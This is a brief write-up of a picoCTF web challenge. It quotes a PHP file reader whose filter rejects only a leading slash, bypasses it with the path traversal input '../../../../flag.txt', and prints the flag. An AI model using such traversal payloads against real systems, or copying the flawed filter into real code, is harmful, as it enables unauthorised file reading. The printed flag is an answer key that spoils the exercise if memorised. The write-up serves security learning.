LT 'syreal' Jones
Can you get the flag?
Here's the website.
We know that the website files live in /usr/share/nginx/html/ and the flag is at /flag.txt but the website is filtering absolute file paths. Can you get past the filter to read the flag?
If we put the name of any of the text files into the textbox, we will be able to see the contents of the file. We'll notice the file goes to read.php so I decided to get the file reader to read read.php wihch resulted in:
$firstChar = $_POST['filename'][0];
if( strcmp($firstChar, '/') == 0 )
{
echo "Not Authorized";
}
else
{
if (file_exists($_POST['filename'])) {
$file = fopen($_POST['filename'], 'r');
while(! feof($file))
{
$line = fgets($file);
echo $line. "
";
}
fclose($file);
} else {
echo "File does not exist";
}
}
?>This code shows the contents of a file if the file exists. Now if we look at the description of the question, we can assume the folders to look something like this:
.
├── usr
│ └── share
│ └── nginx
│ └── html
│ ├── index.php
│ ├── read.php
│ ├── divine-comedy.txt
│ ├── oliver-twist.txt
│ └── the-happy-prince.txt
└── flag.txt
This means that we need to navigate back 4 folders to reach flag.txt. Inputting ../../../../flag.txt into the text box will obtain the flag (.. means go back a directory).
picoCTF{7h3_p47h_70_5ucc355_26b22ab3}